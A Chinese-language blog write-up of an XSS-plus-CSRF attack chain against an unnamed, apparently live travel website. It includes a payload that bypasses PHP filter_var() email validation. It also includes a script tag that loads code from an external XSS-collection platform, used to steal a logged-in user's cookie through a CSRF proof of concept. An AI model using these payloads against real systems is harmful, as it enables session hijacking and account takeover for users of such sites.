对某大佬挖掘过的旅游网进一步打CSRF+XSS组合拳
0x00 前言
0x01开胃小菜
这里用的是PHP filter_var()
函数,通过指定的过滤器过滤变量。可以测试得出,我们只需要 [email protected]
即可绕过:Payload
: **"><svg/onload=confirm(1)>"@qq.com**
成功弹窗反射型xss
0x02 进一步验证CSRF存在性
往常一样,打开bp
设置代理。我们注册了一个账号:账号:[email protected]
密码:123456
这个旅游网并没有对用户注册填写的信息进行验证,所以我们任意注册:
看到师傅写的文章,可以看得出:XSS
是存在的,所以我们就不必去复现了,只需要闭合即可。
我去尝试过了,在最左边的个人资料修改处,抓取参数时有参数id
产生,我也尝试去删除利用,发现无法会使得程序无法应用。所以我们就只能从右边下手。
这个是我盯紧的目标 我们去插入xss
发现可以弹窗,我们再去注册一个账号,使得我们的CSRF
可以利用。账号:nanfang1
密码:123456
注册好后我们开始利用,登回去原先的nanfang
我们去制作csrf
的poc
:
我们去登录nanfang1
这个账号,然后试试可否成功:
会发现这里成功跳转且修改完成。
0x03两道菜组合炒
首先创建一个xsspt
项目:
修改闭合如下:"><script src=https://xsspt.com/xxxxxx></script>//
然后插入nanfang1
当中制作一个csrf
的poc
,来看看能否成功:
我们登录nanfang
这个账户试试能否成功。
看样子是成功插入的,我们去xss
平台上看看有没有cookie
:
成功打到cookie,三分运气七分实力。